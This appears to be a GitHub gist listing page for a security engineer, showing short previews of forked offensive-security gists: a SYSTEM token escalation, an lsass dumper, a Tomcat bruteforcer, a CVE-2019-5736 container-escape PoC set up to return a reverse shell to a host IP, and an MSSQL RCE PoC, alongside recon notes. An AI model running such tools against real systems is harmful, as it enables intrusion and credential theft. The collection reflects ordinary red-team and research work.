Santhosh Baswa P3t3rp4rk3r

🏠

Working from home

#Python-Ninja #Security-Geek #Red-Blue_Team #Threat_Hunting #IR #Malware

206 followers · 237 following

SecOps Engineering & CTF Player
Singapore
https://zer0trustsec.github.io/
@P3t3rP4rk4r

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

P3t3rp4rk3r / defcon29-recon.md

Created August 16, 2021 07:47 — forked from salaheldinaz/defcon29-recon.md

DEFCON29 Recon Village Toots & Resources

🧰 DEFCON29 Recon Village Resources

Talks videos 🎬 Watch here

Future of Asset Management - Ben Sadeghipour

Where to find Domains/subdomains:

Acquisitions https://acquiredby.co/apple-acquisitions/

P3t3rp4rk3r / wordgrab.sh

Created May 8, 2020 16:57 — forked from gwen001/wordgrab.sh

create a wordlist from the target itself

	# with user-agent
	# credits @fo0_
	wordgrab() {
	url=$1
	tmpfile="$(date "+%s")"
	curl -sLk -m 3 -A "Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0" https://$url \| html2text \| egrep -io "[0-9a-zA-Z\-]+" \| tr '[:upper:]' '[:lower:]' \| sed -r "s/^[^a-z]+//g" \| sed -r "s/[^a-z0-9]+$//g" \| sort -fu \| tee -a $tmpfile \| tr '-' '.' \| tee -a $tmpfile \| tr "." "\n" >> $tmpfile
	cat $tmpfile \| sort -fu
	rm $tmpfile
	}

P3t3rp4rk3r / GetSystem.cs

Created April 19, 2020 04:46 — forked from mvelazc0/GetSystem.cs

Escalates to SYSTEM leveraging OpenProcess, OpenProcessToken and ImpersonateLoggedOnUser. https://attack.mitre.org/beta/techniques/T1134/. Needs to run as a High Integrity proc. Needs SeDebugPrivilege

	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Security.Principal;

	namespace GetSystem
	{
	class Program
	{

P3t3rp4rk3r / php-curl-crlf-injection.mkd

Created January 5, 2020 13:17 — forked from tomnomnom/php-curl-crlf-injection.mkd

CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.

P3t3rp4rk3r / autoProc.py

Created August 27, 2019 08:43 — forked from knavesec/autoProc.py

Automatic lsass dumper

	#!/usr/bin/env python
	# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
	#
	# This software is provided under under a slightly modified version
	# of the Apache Software License. See the accompanying LICENSE file
	# for more information.
	#
	# A similar approach to smbexec but executing commands through WMI.
	# Main advantage here is it runs under the user (has to be Admin)
	# account, not SYSTEM, plus, it doesn't generate noisy messages

P3t3rp4rk3r / disposableemailproviders

Created March 24, 2019 04:06

Free disposable email providers

	0-00.usa.cc
	0-mail.com
	001.igg.biz
	0039.cf
	0039.ga
	0039.gq
	0039.ml
	027168.com
	0317123.cn
	0815.ru

P3t3rp4rk3r / tomcat_bruteforce.py

Created March 8, 2019 17:35 — forked from th3gundy/tomcat_bruteforce.py

Tomcat manager console bruteforce

	"""
	Tomcat bruteforce
	Author: @itsecurityco
	"""

	import os
	import sys
	import getopt
	import base64
	import requests

P3t3rp4rk3r / parse_austria.php

Created February 18, 2019 14:26 — forked from geek-at/parse_austria.php

Parsing ip data from a file

	<?php
	$infile = 'austria.csv';
	$outfile = 'austria.ips';

	$fp = fopen($outfile,'w');
	$handle = fopen($infile, "r");
	if ($handle)
	{
	while (($line = fgets($handle)) !== false) {
	$line = trim($line);

P3t3rp4rk3r / cve-2019-5736.py

Created February 13, 2019 11:34 — forked from singe/cve-2019-5736.py

PoC for CVE-2019-5736 in Python

	#!/bin/python3
	# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
	# Target will need a python3 interpreter
	# Edit IP info below, on the host run a netcat to catch the reverse shell
	# Run this python file in the container
	# Then from the host: docker exec -i <container name> /tmp/evil
	import os
	import stat

	host='172.17.0.1'

P3t3rp4rk3r / bad_sequel.py

Created January 29, 2019 14:15 — forked from 3xocyte/bad_sequel.py

PoC MSSQL RCE exploit using Resource-Based Constrained Delegation

	#!/usr/bin/env python

	# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
	# this is a rough PoC

	# requirements for RCE:
	# - the attacker needs to either have or create an object with a service principal name
	# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
	# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
	# - NTLM has to be in use

NewerOlder